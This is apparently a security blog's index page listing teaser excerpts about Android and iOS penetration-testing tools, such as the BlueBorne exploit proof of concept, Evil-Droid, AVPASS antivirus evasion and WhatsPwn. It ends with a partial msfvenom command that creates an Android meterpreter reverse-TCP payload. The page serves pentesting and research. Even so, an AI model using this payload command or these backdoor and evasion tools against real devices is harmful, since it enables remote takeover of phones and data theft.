BlueBorne Android Exploit PoC This repository contains a PoC code of BlueBorne’s Android RCE vulnerability (CVE-2017-0781). It also uses the SDP Information leak vulnerability (CVE-2017-0785) to bypass ASLR. It achieves code execution on a...
Reverse Engineering / Smartphone PenTest
by do son · Published October 17, 2017 · Last modified April 20, 2018
Passionfruit Simple iOS app blackbox assessment tool. Powered by frida.re and vuejs. Features Fully web-based GUI! Only supports jailbroken device now. A non-jailbroken solution is on the way. List all url schemes. Screenshot. List humanly readable app...
Network PenTest / Smartphone PenTest
by do son · Published October 12, 2017 · Last modified October 10, 2021
cSploit: Android network pentesting suite cSploit is a free/libre and open source (GPLed) Android network analysis and penetration suite which aims to be the most complete and advanced professional toolkit for IT security experts/geeks to perform network security assessments...
Evil-Droid Framework Author: Mascerano Bachir Evil-Droid is a framework that creates & generate & embed apk payload to penetrate Android platforms. Legal Disclaimer: The author does not hold any responsibility for the bad use...
Forensics / Reverse Engineering / Smartphone PenTest
by do son · Published September 10, 2017 · Last modified October 10, 2021
MARA_Framework MARA is a Mobile Application Reverse engineering and Analysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against...
Metasploit / Network PenTest / Smartphone PenTest
by do son · Published August 24, 2017 · Last modified November 5, 2017
Make metasploit android payload persistent Add AlarmManager Make service restart on destroy How-to just download release version, unpack android.zip under “data” folder of metasploit-framework’s root directory or compile Compile To compile JavaPayload for Metasploit...
AVPASS AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques. AVPASS...
Smartphone PenTest / Web Vulnerability Analysis / WebApp PenTest
by do son · Published July 22, 2017 · Last modified August 5, 2017
BadIntent Introduction BadIntent is the missing link between the Burp Suite and the core Android’s IPC/Messaging-system. BadIntent consists of two parts, an Xposed-based module running on Android and a Burp-plugin. Based on this interplay,...
Inspeckage – Android Package Inspector Inspeckage is a tool developed to offer dynamic analysis of Android applications. By applying hooks to functions of the Android API, Inspeckage will help you understand what an Android...
WhatsPwn Linux tool used to extract sensitive data, inject backdoor or drop remote shells on Android devices. There may be some bugs on devices running Android 6.* Marshmallow because of new Android security policies....
Exploitation / Network PenTest / Smartphone PenTest / Web Information Gathering / WebApp PenTest
by do son · Published July 14, 2017 · Last modified August 4, 2017
PySploit Framework free exploit framework written use python language version 3.3 Features Easy to use Free and open source Organizer Easy to develop it Programmed using on of the most popular programming language Unlimited...
Reverse Engineering / Smartphone PenTest
by do son · Published July 13, 2017 · Last modified October 10, 2021
Androguard – reverse engineering , Android app malware and good software analysis Android Apk decompiler – Online decompile for Apk and Dex Android files Android loadble kernel module – it is mainly used in the controlled system/simulator on the reverse and debugging. AndBug – Android debug...
Reverse Engineering / Smartphone PenTest
by do son · Published July 11, 2017 · Last modified August 4, 2017
Androguard – reverse engineering , Android app malware and good software analysis Features Androguard is a full python tool to play with Android files. DEX, ODEX APK Android’s binary xml Android resources Disassemble DEX/ODEX bytecodes Decompiler for...
Needle is an open source, modular framework to streamline the process of conducting security assessments of iOS apps. Assessing the security of an iOS application typically requires a plethora of tools, each developed for...
Metasploit / Network PenTest / Smartphone PenTest
by do son · Published July 3, 2017 · Last modified August 2, 2017
Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework. Create payload using metasploit msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port >...
Secure Your Connection
